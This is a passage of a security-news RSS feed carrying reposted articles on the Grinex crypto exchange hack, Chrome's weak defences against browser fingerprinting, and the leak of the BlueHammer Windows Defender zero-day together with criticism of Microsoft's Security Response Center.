	The Trump administration has been on a hiring spree. A Department of Homeland Security press release from January says that ICE hired over 12,000 officers and agents in less than a year. As part of their job applications, immigration officers are supposed to go through extensive background checks that probe everything from what arrests they might have had, the debts they’ve racked up, and foreign nationals they’ve interacted with in the past seven years. The Associated Press did its own background checks on 40 ICE agents and found three that had faced lawsuits because of alleged misconduct in their previous law enforcement jobs, and several that reportedly faced legal actions because of their histories of unpaid debt. DHS didn’t comment on specific hiring choices, but acknowledged to the AP that it had given some applicants “temporary selection letters” and offers to start working before their full background checks had been completed.
</p>

<p>
	<br />
	<span style="font-size:24px;"><strong>Russian Crypto Exchange Grinex Hacked, Blames Foreign Spies</strong></span>
</p>

<p>
	 
</p>

<p>
	The Russian cryptocurrency exchange Grinex, widely reported to have aided Russia’s sanctions evasion, abruptly announced Thursday that it would be suspending its operations following a breach that it says allowed a hacker to steal more than a billion rubles’ worth of its users’ funds, equivalent to more than $13 million. In its announcements on its social accounts, Grinex blamed the “special services” of a foreign country, writing that the “digital traces and the nature of the attack indicate an unprecedented level of resources and technologies available exclusively to structures of unfriendly states” and seemed to be aimed at “causing direct damage to Russia's financial sovereignty.” Grinex, which was itself sanctioned by US financial authorities, had served as the successor to Garantex, another Russian exchange that had been sanctioned for enabling sanctions evasion and other alleged financial crimes. According to crypto-tracing firm Elliptic, Grinex was likely created by the same owners and inherited Garantex funds and customers. Grinex didn’t provide any public evidence to back its claim that the theft of its funds was carried out by state-sponsored hackers.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.wired.com/story/security-news-this-week-it-takes-2-minutes-to-hack-the-eus-new-age-verification-app/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">34642</guid><pubDate>Mon, 20 Apr 2026 12:18:58 +0000</pubDate></item><item><title>Report: Google Chrome lacks a very important feature Microsoft Edge, Firefox, Brave have</title><link>https://nsaneforums.com/news/security-privacy-news/report-google-chrome-lacks-a-very-important-feature-microsoft-edge-firefox-brave-have-r34614/</link><description><![CDATA[<h3>
	Here's how Microsoft Edge, Mozilla Firefox and Brave protect you against browser fingerprinting, a security feature Google Chrome lacks.
</h3>

<p>
	Last year, Neowin reported on a privacy-focused study which examined how various web browsers ensure user privacy. Surprisingly or perhaps unsurprisingly, Google Chrome came out on top as the worst among all, <em>edging</em> out Microsoft's Edge. The two scored 76 and 63, respectively (the higher the score, the worse it is). To be fair to Chrome, Vivaldi was just as bad as Chrome as it scored 75. Mozilla's Firefox however did much better as it put up 50 out of 100. You can view the full scorecard in <a automate_uuid="b83c1dfc-ecb5-4474-a4aa-1d4424799bdf" href="https://www.neowin.net/news/report-chrome-among-the-worst-browsers-when-it-comes-to-user-privacy/" rel="external nofollow">our dedicated article</a>.
</p>

<p>
	 
</p>

<p>
	From time to time, however, Google keeps adding features that <a automate_uuid="f4e156eb-3d17-4684-973e-05758c1c72dc" href="https://www.neowin.net/news/google-changes-safe-browsing-for-chrome-to-include-real-time-protection-for-hostile-websites/" rel="external nofollow">promise to enhance user privacy</a>. A new report though agrees with the previous study as it suggests that Google Chrome offers "almost no native anti-fingerprinting defences, unlike Brave, Firefox, or Tor." The report investigated the features Google offers on Chrome to protect users against device fingerprinting and browser fingerprinting, among others. Sadly most of it seemed sub-par, leading the author to conclude that Google abandoned its Privacy Sandbox plans and "left us with nothing". Google did have its reasons which you can read about <a automate_uuid="53bfb739-f17d-4886-aa0b-8cae40f363a7" href="https://www.neowin.net/news/google-does-a-180-as-it-will-keep-supporting-third-party-cookies-in-chrome-after-all/" rel="external nofollow">in our coverage</a>.
</p>

<p>
	 
</p>

<p>
	If you are not aware, browser fingerprinting works much like a real fingerprint: by combining many small attributes of the browser, OS, GPU, CPU, installed fonts and other hardware and software, a website can derive an identifier that is close to unique to a particular user and device, and so track them across sites without relying on cookies. It essentially undermines anonymity on the web.
</p>

<p>
	 
</p>

<p>
	The issue stems largely from what modern browsers have become. They are far more than simple web access tools now, acting as full-fledged platforms that handle logins, store passwords and PINs, sync data across devices, and track user activity for performance and personalization.
</p>

<p>
	 
</p>

<p>
	Hence, unlike malware, <a automate_uuid="67999d63-12cd-469f-b285-5d283d3efbe6" href="https://www.neowin.net/news/beware-this-windows-11-24h2-update-download-can-quietly-steal-your-sensitive-data/" rel="external nofollow">which typically raises immediate red flags</a>, browser-level tracking is often built into core functionality that depends on collecting user information. Browsers thus become a centralized hub of sensitive data, holding everything from browsing history and session tokens to saved credentials and device fingerprints, and things can easily go wrong.
</p>

<p>
	 
</p>

<p>
	And they can go from bad to worse on Chrome as it comes with "canvas, audio, WebGL, fonts and speech synthesis APIs completely unprotected," which means all that unique user data could be accessible to the online world.
</p>

<p>
	 
</p>

<p>
	Interestingly, Mozilla Firefox offers some native resistance against fingerprinting with the <code>privacy.resistFingerprinting</code> flag, which can be enabled in about:config. Brave goes further with its built-in <a automate_uuid="92b21c0c-b8e6-41b5-858e-f9f3f66a5c00" href="https://github.com/brave/brave-browser/wiki/Fingerprinting-Protections" rel="external nofollow">Farbling feature</a>: it blocks known fingerprinting scripts and randomizes the values readable from canvas and similar APIs so that they differ per site and per session, while the page still renders correctly for the user. Finally, Microsoft's own Edge also offers more than Google Chrome thanks to its <a automate_uuid="b124cdf0-6840-4cfa-8486-7681852f774c" href="https://www.neowin.net/news/microsoft-edge-146-is-out-with-password-manager-changes-important-windows-fixes-and-more/#:~:text=single%20setting%20for-,tracking%20prevention,-.%20The%20update%20removed" rel="external nofollow">Tracking Prevention feature</a>, which can limit fingerprint tracking.
</p>

<p>
	 
</p>

<p>
	Source: <a automate_uuid="5dc3fc9b-37db-450a-88ac-b7a61a13e286" href="https://www.thatprivacyguy.com/blog/the-beast-behind-the-browser/" rel="external nofollow">That Privacy Guy</a>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/report-google-chrome-lacks-a-very-important-feature-microsoft-edge-firefox-brave-have/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Saturday 18 April 2026 at 7:35 am AEST (my time).</em></span>
</p>
]]></description><guid isPermaLink="false">34614</guid><pubDate>Fri, 17 Apr 2026 21:35:35 +0000</pubDate></item><item><title>"Microsoft fired the skilled people, leaving flowchart followers": Microsoft's Security Response Center is being blamed for the zero-day BlueHammer exploit leak, but I can't tell who's right</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-fired-the-skilled-people-leaving-flowchart-followers-microsofts-security-response-center-is-being-blamed-for-the-zero-day-bluehammer-exploit-leak-but-i-cant-tell-whos-right-r34597/</link><description><![CDATA[<h3>
	A zero-day BlueHammer exploit was recently published on GitHub in response to alleged MSRC failures, and although Microsoft has since released a patch, the exploit was public and unpatched for nearly two weeks.
</h3>

<p id="elk-e4b7b73b-426d-4462-8251-8f5a1b15ac7e">
	On April 2, 2026, a security researcher using the name Chaotic Eclipse published a <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://deadeclipse666.blogspot.com/2026/04/public-disclosure.html" href="https://deadeclipse666.blogspot.com/2026/04/public-disclosure.html" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">blog post</a> stating that they were "<em>doing it again.</em>" Under this warning was a link to a <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/github" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowscentral.com/tag/github" href="https://www.windowscentral.com/tag/github" rel="external nofollow">GitHub</a> account page for a user named "Nightmare Eclipse" containing an exploit known as <strong>BlueHammer</strong>.
</p>

<p>
	 
</p>

<p>
	BlueHammer, as it turns out, is a <strong>zero-day Windows exploit</strong>, meaning it was published before Microsoft had a fix available. BlueHammer has been confirmed to work by Will Dormann, a principal vulnerability analyst at Tharros (via ).
</p>

<p>
	 
</p>


<p aria-hidden="true" id="elk-e4b7b73b-426d-4462-8251-8f5a1b15ac7e-2">
	As explained, BlueHammer chains a <strong>time-of-check to time-of-use (TOCTOU)</strong> race with a <strong>path confusion</strong> in <strong>Windows Defender</strong> into a <strong>local privilege escalation (LPE)</strong>, ending with the attacker running as SYSTEM for a complete PC takeover.
</p>

<p>
	 
</p>

<p aria-hidden="true">
	It's a nasty little bug, to say the least, and it appears to have been released into the wild due to perceived incompetence on the part of <strong>Microsoft's Security Response Center (MSRC)</strong>.
</p>


<h2 id="microsoft-security-response-center-takes-the-blame-microsoft-responds-3">
	Microsoft Security Response Center takes the blame; Microsoft responds
</h2>

<div>
	<div>
		<p>
			<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-1200-80.png.webp 1200w, https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-1024-80.png.webp 1024w, https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-970-80.png.webp 970w, https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-650-80.png.webp 650w, https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-480-80.png.webp 480w, https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-320-80.png.webp 320w" type="image/webp"> <img alt="BlueHammer GitHub page" class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/PDZ9TYyjZbjgyKkoyKkoXm-1024-80.png"> </source></picture>
		</p>

		<p>
			<em><span>The note attached to the GitHub BlueHammer page. </span></em>
		</p>

		<p>
			<em><span itemprop="copyrightHolder">(Image credit: GitHub)</span></em>
		</p>

		<p>
			 
		</p>

		<p id="elk-d1545583-0736-4d6d-80e8-910e24c783a8">
			The worst part about the BlueHammer incident is that, according to the leaker, it apparently could have been prevented. In the original blog post, the frustrated security researcher stated:
		</p>

		<p>
			 
		</p>

		<p style="margin-left: 40px;">
			<em>"Unlike previous times, I'm not explaining how this works, y'all geniuses can figure it out. Also, huge thanks to MSRC leadership for making this possible!!! And special thanks to Tom Gallagher!"</em>
		</p>

		<p>
			 
		</p>

		<p>
			The Gallagher mentioned in the jab is presumably the <strong>VP of Engineering for MSRC</strong>. The jabs don't stop there, continuing on the BlueHammer GitHub page.
		</p>

		<p>
			 
		</p>

		<p style="margin-left: 40px;">
			<em>"I'm just really wondering what was the math behind their decision, like you knew this was going to happen and you still did whatever you did? Are they serious?"</em>
		</p>

		<p>
			 
		</p>

		<p>
			Judging by these semi-vague statements, whoever leaked the BlueHammer exploit attempted first to privately work with the MSRC in order to get the issue fixed, but became fed up.
		</p>

		<p>
			 
		</p>

		<div>
			<div>
				<p>
					<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-882-80.png.webp 1200w, https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-882-80.png.webp 1024w, https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-882-80.png.webp 970w, https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-650-80.png.webp 650w, https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-480-80.png.webp 480w, https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-320-80.png.webp 320w" type="image/webp"> <img alt="Will Dormann confirming BlueHammer works" class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/FukLJWFa4jKf9TdTspUWjU-882-80.png"> </source></picture>
				</p>

				<p>
					<em><span>Will Dormann confirms the BlueHammer exploit works in a Mastodon post. </span></em>
				</p>

				<p>
					<em><span itemprop="copyrightHolder">(Image credit: @wdormann (Mastodon))</span></em>
				</p>

				<p>
					 
				</p>

				<p id="elk-c236e216-cc8e-4e45-9a6c-981dc08d29c0">
					Dormann, who confirmed the exploit, <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://mastodon.social/@wdormann@infosec.exchange/116358064771114232" href="https://mastodon.social/@wdormann@infosec.exchange/116358064771114232" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">shared some interesting words on Mastodon</a> on April 6.
				</p>

				<p>
					 
				</p>

				<p style="margin-left: 40px;">
					<em>"MSRC used to be quite excellent to work with. But to save money Microsoft fired skilled people, leaving flowchart followers. I wouldn't be surprised if Microsoft closed the case after the reporter refused to submit a video of the exploit, since that's apparently an MSRC requirement now."</em>
				</p>

				<p>
					 
				</p>

				<p>
					The BlueHammer incident isn't a good look for Microsoft's main line of defense against zero-day exploits. Of course, it's nigh impossible to confirm that the leaker actually reached out to Microsoft's Security Response Center team before posting the exploit on GitHub.
				</p>

				<p>
					 
				</p>

				<hr>
				<p>
					 
				</p>

				<p id="elk-48158bf8-4f46-4692-901b-043f32dc1030">
					In a response to BleepingComputer, added to the original article covering BlueHammer, a Microsoft spokesperson said this:
				</p>

				<p>
					 
				</p>

				<p style="margin-left: 40px;">
					<em>"Microsoft has a customer commitment to investigate reported security issues and update impacted devices to protect customers as soon as possible. We also support coordinated vulnerability disclosure, a widely adopted industry practice that helps ensure issues are carefully investigated and addressed before public disclosure, supporting both customer protection and the security research community."</em>
				</p>

				<p>
					 
				</p>

				<p>
					It's a rather boilerplate response, and security communities are understandably upset about the leaked exploit and Microsoft's perceived incompetence.
				</p>

				<p>
					 
				</p>

				<p>
					Over on GitHub, the BlueHammer exploit has, at the time of writing, some <strong>1,200 stars</strong> and <strong>425 forks</strong>, meaning at least 425 accounts have made their own copy of the repository, whether to modify it, study it, or simply preserve it.
				</p>

				<h2 id="microsoft-promised-to-make-windows-11-better-so-why-did-msrc-allegedly-drop-the-ball-3">
					Microsoft promised to make Windows 11 better, so why did MSRC allegedly drop the ball?
				</h2>

				<div>
					<div>
						<p>
							<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-320-80.jpg.webp 320w" type="image/webp"> <img alt="Windows 11 Search" class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/cNPCYbRjoVBy9RXHQA9ZzQ-1024-80.jpg"> </source></picture>
						</p>

						<p>
							<em><span>The Windows 11 Search bar inside the Start menu. </span></em>
						</p>

						<p>
							<em><span itemprop="copyrightHolder">(Image credit: Future)</span></em>
						</p>

						<p>
							 
						</p>

						<p id="elk-1ba1faf2-6a69-43d7-ac22-be378274ccee">
							A zero-day exploit like BlueHammer released into the wild is one thing, but when it's claimed to be in response to MSRC incompetence, it's something else entirely.
						</p>

						<p>
							 
						</p>

						<p>
							<a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/microsoft/windows-11/windows-11-major-improvements-announced-movable-taskbar-less-ads-reduced-copilot-better-performance-2026" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowscentral.com/microsoft/windows-11/windows-11-major-improvements-announced-movable-taskbar-less-ads-reduced-copilot-better-performance-2026" href="https://www.windowscentral.com/microsoft/windows-11/windows-11-major-improvements-announced-movable-taskbar-less-ads-reduced-copilot-better-performance-2026" rel="external nofollow" target="_blank">Microsoft has been putting a lot of resources lately into improving Windows</a>, mainly in response to sustained negative feedback that's often turned into outrage from the community.
						</p>

						<p>
							 
						</p>

						<p>
							While the EVP of Windows &amp; Devices at Microsoft, Pavan Davuluri, has promised his team is "<em>focusing on making Windows 11 more responsive and consistent</em>" by way of "<em>improving system performance, app responsiveness, File Explorer and the Windows Subsystem for <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/linux" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.windowscentral.com/tag/linux" href="https://www.windowscentral.com/tag/linux" rel="external nofollow">Linux</a></em>," it won't mean much if Microsoft can't properly stay ahead of serious threats.
						</p>

						<figure id="elk-7ff03df9-ca75-4594-865d-53cde22f71ee">
							<blockquote class="QuoteNewsStyle">
								<p>
									A zero-day exploit like BlueHammer released into the wild is one thing, but when it's claimed to be in response to MSRC incompetence, it's something else entirely.
								</p>
							</blockquote>
						</figure>

						<p id="elk-d530570b-3e97-44b6-99bc-cb871b1d878f">
							On my mind is news about <strong>Claude Mythos</strong>, a new model that recently proved it could identify cybersecurity vulnerabilities that had gone unnoticed for decades. It was so powerful that it <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://www.forbes.com/sites/jonmarkman/2026/04/14/how-claude-mythos-wiped-billions-out-of-cybersecurity-stocks/" href="https://www.forbes.com/sites/jonmarkman/2026/04/14/how-claude-mythos-wiped-billions-out-of-cybersecurity-stocks/" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">caused cybersecurity stocks to fall off a cliff</a>, and it has since been put back into a cage by its Anthropic overlords while governments figure out what to do about the perceived threat.
						</p>

						<p>
							 
						</p>

						<p>
							If Microsoft has indeed gutted its MSRC team, as posited by Dormann, I don't doubt that Windows could be in serious trouble as security threats evolve.
						</p>

						<p>
							 
						</p>

						<p>
							Microsoft raked in about $281 billion in revenue in 2025. Surely more of that can go toward keeping the MSRC, which has been a key part of keeping Windows secure since 1998, in top form.
						</p>

						<h2 id="bluehammer-was-killed-in-a-recent-windows-update-but-it-was-live-for-nearly-two-weeks-3">
							BlueHammer was killed in a recent Windows update, but it was live for nearly two weeks
						</h2>

						<div>
							<div>
								<p>
									<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-898-80.png.webp 1200w, https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-898-80.png.webp 1024w, https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-898-80.png.webp 970w, https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-650-80.png.webp 650w, https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-480-80.png.webp 480w, https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-320-80.png.webp 320w" type="image/webp"> <img alt="Will Dormann BlueHammer Mastodon" class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/q3KEwgi6VGEZkKuyf3cpQJ-898-80.png"> </source></picture>
								</p>

								<p>
									<em><span>Security researcher Will Dormann comments on the BlueHammer fix and leftover vulnerabilities. </span></em>
								</p>

								<p>
									<em><span itemprop="copyrightHolder">(Image credit: @wdormann (Mastodon))</span></em>
								</p>

								<p>
									 
								</p>

								<p id="elk-8123ecb4-4fe2-4123-9bac-da3e7bc78ac5">
									I've been following Will Dormann's updates regarding BlueHammer, and he <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://mastodon.social/@wdormann@infosec.exchange/116404516681065951" href="https://mastodon.social/@wdormann@infosec.exchange/116404516681065951" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">recently posted proof</a> that the exploit was killed in the latest <a data-analytics-id="inline-link" data-hl-processed="none" data-mrf-recirculation="inline-link" data-url="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825" href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Windows 11 CVE-2026-33825</a> update from April 14, 2026.
								</p>

								<p>
									 
								</p>

								<p>
									Dormann notes that the "<em>exploit doesn't get past the point where it makes a symlink within the Windows object manager</em>." However, he also notes that "<em>if you look under the hood, some of the suspicious parts of the exploit still seem to work.</em>"
								</p>

								<p>
									 
								</p>

								<p>
									So, yes, the exploit is technically broken after the Windows update, but some of the nasty bits remain.
								</p>

								<h2 id="what-do-you-think-about-the-bluehammer-incident-3">
									What do you think about the BlueHammer incident?
								</h2>

								<p id="elk-ee44cc5e-8d6a-47d3-b5fb-9cea332c32ce">
									<em>All signs point to Microsoft's Security Response Center failing to act when it was presented with BlueHammer exploit details. Do you think the leaker is lying and is instead attempting to libel the company?</em>
								</p>

								<p>
									 
								</p>

								<p>
									<em>Or are you of the mind that security researcher Will Dormann is correct when he says that Microsoft gutted the MSRC program, which led to the leak after official channels failed to act?</em>
								</p>

								<p>
									 
								</p>

								<p>
									<em>Let me know what you think, including any first-hand experience you have with MSRC, in the comments section below.</em>
								</p>

								<p>
									 
								</p>

								<p>
									<a href="https://www.windowscentral.com/microsoft/microsoft-security-response-center-bluehammer-exploit" rel="external nofollow">Source</a>
								</p>

								<hr class="ipsHr">

								<p>
									<span style="font-size:12px;"><em>Posted Friday 17 April 2026 at 7:32 am AEST (my time).</em></span>
								</p>


							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">34597</guid><pubDate>Thu, 16 Apr 2026 21:33:57 +0000</pubDate></item></channel></rss>
